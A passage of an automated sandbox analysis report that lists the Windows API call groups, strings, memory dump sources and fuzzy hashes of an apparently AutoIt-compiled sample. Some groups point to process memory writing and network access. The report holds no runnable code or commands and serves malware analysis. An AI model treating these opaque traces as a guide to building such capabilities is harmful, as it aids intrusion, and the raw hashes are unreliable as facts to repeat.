                                                                                                                                                                                                                      • Part of subcall function 00007FF656D2F7B8: CloseHandle.KERNEL32(?,?,?,00007FF656D30063,?,?,?,00007FF656D129AD,?,?,?,00007FF656CC2AB2), ref: 00007FF656D2F7C9
                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?,?,?,00007FF656D129AD,?,?,?,00007FF656CC2AB2), ref: 00007FF656D3006A
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: CriticalSection$CloseEnterHandleLeaveLockObjectSingleSyncTerminateThreadWait
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3142591903-0
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ErrorExitLastThread
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1611280651-0
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2625713937-0
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Thread$CurrentProcessWindow$AttachInputMessageSendTimeout
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 179993514-0
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Thread$CurrentProcessWindow$AttachInputMessageSendTimeout
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 179993514-0
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: CreateInitializeInstanceUninitialize
                                                                                                                                                                                                                    • String ID: .lnk
                                                                                                                                                                                                                    • API String ID: 948891078-24824748
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                    • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                                                                                                                                                                                    • API String ID: 3215553584-1196891531
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                    • String ID: $*
                                                                                                                                                                                                                    • API String ID: 3215553584-3982473090
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: _set_statfp
                                                                                                                                                                                                                    • String ID: !$acos
                                                                                                                                                                                                                    • API String ID: 1156100317-2870037509
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: _set_statfp
                                                                                                                                                                                                                    • String ID: !$asin
                                                                                                                                                                                                                    • API String ID: 1156100317-2188059690
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                                                                                                                                                    • String ID: @
                                                                                                                                                                                                                    • API String ID: 4150878124-2766056989
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Menu$Delete$InfoItem
                                                                                                                                                                                                                    • String ID: P
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ByteCharErrorFileLastMultiWideWrite
                                                                                                                                                                                                                    • String ID: U
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Window$Long
                                                                                                                                                                                                                    • String ID: SysTreeView32
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: MessageSend$Window$CreateObjectStock
                                                                                                                                                                                                                    • String ID: SysMonthCal32
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: MessageSend$Window$CreateDestroyObjectStock
                                                                                                                                                                                                                    • String ID: msctls_updown32
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: MessageSend$Window$CreateMoveObjectStock
                                                                                                                                                                                                                    • String ID: Listbox
                                                                                                                                                                                                                    • API String ID: 3747482310-2633736733
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ErrorMode$InformationVolume
                                                                                                                                                                                                                    • String ID: %lu
                                                                                                                                                                                                                    • API String ID: 2507767853-685833217
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: MessageSend$CreateObjectStockWindow
                                                                                                                                                                                                                    • String ID: msctls_trackbar32
                                                                                                                                                                                                                    • API String ID: 1025951953-1010561917
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Thread$CurrentProcessWindow$AttachChildClassEnumFocusInputMessageNameParentSendTimeoutWindows
                                                                                                                                                                                                                    • String ID: %s%d
                                                                                                                                                                                                                    • API String ID: 2330185562-1110647743
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Exception$DestructObject$Raise__vcrt_getptd_noexit
                                                                                                                                                                                                                    • String ID: csm
                                                                                                                                                                                                                    • API String ID: 2280078643-1018135373
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: CloseControlCreateDeviceFileHandle
                                                                                                                                                                                                                    • String ID: 0
                                                                                                                                                                                                                    • API String ID: 33631002-4108050209
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF656D12DD1), ref: 00007FF656D4AF37
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF656D12DD1), ref: 00007FF656D4AF4F
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                                    • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                                                                                                                                                                                    • API String ID: 2574300362-1816364905
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                                    • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                                                                                                                                    • API String ID: 2574300362-4033151799
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                                    • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                                                                                                                                                                    • API String ID: 2574300362-3689287502
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                                    • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                                                                                                                                                                    • API String ID: 2574300362-1355242751
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                                    • String ID: GetNativeSystemInfo$kernel32.dll
                                                                                                                                                                                                                    • API String ID: 2574300362-192647395
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ClearVariant
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1473721057-0
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2000298826-0
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Window$ClientMessageMoveRectScreenSend
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1249313431-0
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: CreateDirectory$AttributesErrorFileLast
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2267087916-0
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ErrorLast$socket
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1881357543-0
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3321077145-0
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Rect$BeepClientMessageScreenWindow
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1352109105-0
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Menu$Item$DrawInfoInsert
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3076010158-0
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: _invalid_parameter_noinfo$ByteCharErrorLastMultiWide
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 4141327611-0
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: KeyboardState$InputMessagePostSend
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 432972143-0
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: LongWindow$InvalidateMessageRectSend
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3340791633-0
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: KeyboardState$InputMessagePostSend
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 432972143-0
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Internet$CloseConnectHandleOpen
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1463438336-0
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF656CEA27B,?,?,?,00007FF656CEA236), ref: 00007FF656CF3DB1
                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF656CEA27B,?,?,?,00007FF656CEA236), ref: 00007FF656CF3E13
                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF656CEA27B,?,?,?,00007FF656CEA236), ref: 00007FF656CF3E4D
                                                                                                                                                                                                                    • FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF656CEA27B,?,?,?,00007FF656CEA236), ref: 00007FF656CF3E77
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ByteCharEnvironmentMultiStringsWide$Free
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1557788787-0
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Window$Long
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 847901565-0
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2864067406-0
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: lstrcmpilstrcpylstrlen
                                                                                                                                                                                                                    • String ID: cdecl
                                                                                                                                                                                                                    • API String ID: 4031866154-3896280584
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Heap$InformationProcessToken$AllocCopyErrorFreeLastLength
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 837644225-0
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: CreateMessageObjectSendStockWindow
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3970641297-0
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 00007FF656CB2A54: GetWindowLongPtrW.USER32 ref: 00007FF656CB2A71
                                                                                                                                                                                                                    • GetClientRect.USER32(?,?,?,?,?,00007FF656CFAA36,?,?,?,?,?,?,?,?,?,00007FF656CB27AF), ref: 00007FF656D622C4
                                                                                                                                                                                                                    • GetCursorPos.USER32(?,?,?,?,?,00007FF656CFAA36,?,?,?,?,?,?,?,?,?,00007FF656CB27AF), ref: 00007FF656D622CF
                                                                                                                                                                                                                    • ScreenToClient.USER32 ref: 00007FF656D622DD
                                                                                                                                                                                                                    • DefDlgProcW.USER32(?,?,?,?,?,00007FF656CFAA36,?,?,?,?,?,?,?,?,?,00007FF656CB27AF), ref: 00007FF656D6231F
                                                                                                                                                                                                                      • Part of subcall function 00007FF656D5E894: LoadCursorW.USER32 ref: 00007FF656D5E945
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ClientCursor$LoadLongProcRectScreenWindow
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: _ctrlfp
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: CloseCurrentHandleMessageObjectSingleThreadWait_invalid_parameter_noinfo
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ClientRectScreen$InvalidateWindow
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Type$Register$FileLoadModuleNameUser
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ErrorLast$abort
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: CounterPerformanceQuerySleep
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2875609808-0
                                                                                                                                                                                                                    • Opcode ID: c6a5989f9dc195674d757a8e27f3c1042de8158b51fda3090b6682196588991b
                                                                                                                                                                                                                    • Instruction ID: ef7f07712776b70f47e32501276f689e71e5bf7f3350661babf722608f6926f7
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c6a5989f9dc195674d757a8e27f3c1042de8158b51fda3090b6682196588991b
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C401F560A0CB8642EA265B36D84017BB360BF99741F8C0736E98FB5560CF2EE4D6C600
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1539411459-0
                                                                                                                                                                                                                    • Opcode ID: 058f7c961f19f1df1cfb2125e1cbf4c754dffe1c4cdb6de871a3d3459fa768a6
                                                                                                                                                                                                                    • Instruction ID: c7deb8cddfe9caca1adb396872da30f49fd5e638390bed7a6b6d4e0795dff73d
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 058f7c961f19f1df1cfb2125e1cbf4c754dffe1c4cdb6de871a3d3459fa768a6
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4501B135A2879183E7008B16F9097297B60BB81BD4F1C0734DE5953BA1CF7EE881CB00
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: CurrentOpenProcessThreadToken
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3974789173-0
                                                                                                                                                                                                                    • Opcode ID: 5cd93aab99a75fcfcb42631ab9fe43dfed1bd9e6d723e162398547d1910a1280
                                                                                                                                                                                                                    • Instruction ID: 13448c6b2244f8068e31127f7c6df1cc4388ecb0aa6dc0c55c245a1c96db3fb6
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5cd93aab99a75fcfcb42631ab9fe43dfed1bd9e6d723e162398547d1910a1280
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 08F03962A5990282FB504F62E84577822A0EF59BC9F8C4B34C90EA2250EF7E99D9C340
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2889604237-0
                                                                                                                                                                                                                    • Opcode ID: 1feedfad755e607c49e01145a3823af596c92df2e00356d80eed4a018d1c4b5c
                                                                                                                                                                                                                    • Instruction ID: d8d3b49fc6697b01672cad853d01de015b65c49a1a5e07ae7ba01c45bcd4aec2
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1feedfad755e607c49e01145a3823af596c92df2e00356d80eed4a018d1c4b5c
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 08E01260A0931286FA009F62A90C2383364AF49FC1F0A4B30CD0FA3B95DE7EA085C300
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2889604237-0
                                                                                                                                                                                                                    • Opcode ID: 0f8fd1d3423bd3015dfaeae2d2106595fe3726f148ce33332917fba087c4fcce
                                                                                                                                                                                                                    • Instruction ID: af1cb6f41f4198c5e0d98d4f06976342f54264896df89ac0eee0b19e44e54f2d
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0f8fd1d3423bd3015dfaeae2d2106595fe3726f148ce33332917fba087c4fcce
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E2E0B660B0975286FA04DF62E95C2383265AF49FD5F094A34CE1FA7B65DE7FA085C700
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                    • String ID: gfffffff
                                                                                                                                                                                                                    • API String ID: 3215553584-1523873471
                                                                                                                                                                                                                    • Opcode ID: dc31ed7580b08dc4a7b229eebc0aac3b305a5916052008eb2c70828ae2249d51
                                                                                                                                                                                                                    • Instruction ID: 344e06997f2140a47affe9be14a8e5cb91812e4aff2ed5f22fbff7b4f7f07a75
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: dc31ed7580b08dc4a7b229eebc0aac3b305a5916052008eb2c70828ae2249d51
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 20914DA3B097C786EB228F29914237C6B75AB657D0F088131DBAD97395DE3EE911C301
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ContainedObject
                                                                                                                                                                                                                    • String ID: AutoIt3GUI$Container
                                                                                                                                                                                                                    • API String ID: 3565006973-3941886329
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmp
